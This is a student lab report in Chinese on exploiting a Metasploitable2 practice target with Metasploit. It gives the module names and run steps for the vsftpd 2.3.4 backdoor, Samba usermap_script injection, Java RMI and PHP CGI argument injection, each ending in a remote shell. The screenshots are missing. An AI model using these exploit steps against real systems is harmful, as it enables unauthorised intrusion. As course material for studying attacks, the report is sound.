20222402 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

nonosuperman發表於2024-11-22

1.實驗內容
1.1本週學習內容
常見的網路安全協議包括SSL/TLS等。
網路安全協議攻擊手段
DNS欺騙攻擊:攻擊者冒充域名伺服器,將查詢的IP地址設為攻擊者的IP地址,從而誘騙使用者訪問惡意網站或下載惡意軟體。
ARP欺騙攻擊:分為對路由器ARP表的欺騙和對內網PC的閘道器欺騙,透過截獲閘道器資料或偽造閘道器來實施攻擊。
1.2實驗內容
(1)前期滲透
①主機發現(可用Aux中的arp_sweep,search一下就可以use)
②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③選做:也可以掃系統版本、漏洞等。
(2)Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
利用步驟:
在kali中執行msfconsole 啟動metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 選擇漏洞
set RHOST XX.xx.xx.xx 設定要攻擊的機器IP(靶機IP)
exploit/run 開始攻擊
利用成功
執行uname –a、 pwd、 id等命令 驗證
(3)SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
利用步驟:
use exploit/multi/samba/usermap_script 選擇漏洞
set RHOST ip 設定要攻擊的機器IP
exploit 開始攻擊
利用成功 執行uname–a驗證
(4)Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
操作步驟:
首先檢視1099埠是否開啟。
然後在MSF中:
use exploit/multi/misc/java_rmi_server
show options 檢視配置引數
set RHOST (靶機IP)
exploit/run
sessions -i id
shell (進入meterpreter時,使用whoami驗證下)
(5)PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
在kali中執行msfconsole,啟動metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 選擇漏洞
set RHOST ip 設定要攻擊的機器IP
exploit/run 開始攻擊
2.實驗過程
2.1前期滲透
2.1.1主機發現
攻擊機:

靶機:

使用Aux中的arp_sweep掃描靶機:

掃描成功
2.1.2埠掃描
使用Aux中的portscan/tcp掃描靶機IP:

設定IP後開始掃描埠:

2.1.3掃描系統版本、漏洞
掃描系統版本:

掃描漏洞:

2.2Vsftpd原始碼包後門漏洞(21埠)
在kali中執行msfconsole 啟動metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 選擇漏洞
set RHOST 192.168.52.149 設定要攻擊的機器IP
exploit 開始攻擊

2.3SambaMS-RPC Shell命令注入漏洞(埠139)
use exploit/multi/samba/usermap_script 選擇漏洞
set RHOST ip 192.168.52.149 設定要攻擊的機器IP
exploit 開始攻擊

2.4Java RMI SERVER命令執行漏洞(1099埠)
首先檢視1099埠是否開啟

use exploit/multi/misc/java_rmi_server
show options 檢視配置引數
set RHOST 192.168.52.149(靶機IP)
exploit/run
sessions -i id
shell

2.5PHP CGI引數執行注入漏洞(80埠)
use exploit/multi/http/php_cgi_arg_injection 選擇漏洞
set RHOST ip 192.168.52.149 設定要攻擊的機器IP
exploit/run 開始攻擊

3.問題及解決方案

4.學習感悟、思考等
這次實驗讓我深刻理解了漏洞評估的重要性。透過Metasploitable2靶機,我學會了如何結合使用各種工具如Nmap、Open-Vas等進行漏洞掃描和分析。
在實驗過程中,我體驗到了不同漏洞利用模組的操作。例如,針對Samba服務的漏洞,我透過搜尋並選擇了合適的漏洞利用模組,並設定了攻擊載荷和引數,最終獲取了目標主機的Shell。這個過程讓我對漏洞利用有了更深入的認識,並學會了如何根據目標系統的具體情況選擇合適的Exploit和Payload。
最後,這次實驗也讓我意識到了自動化工具與手動方法的結合使用的重要性。雖然自動化工具如Open-Vas可以大大提高掃描效率,但其準確性有時需要手動方法進行驗證。因此,在實際應用中,我們需要結合兩者來確保掃描結果的準確性。

參考資料

相關文章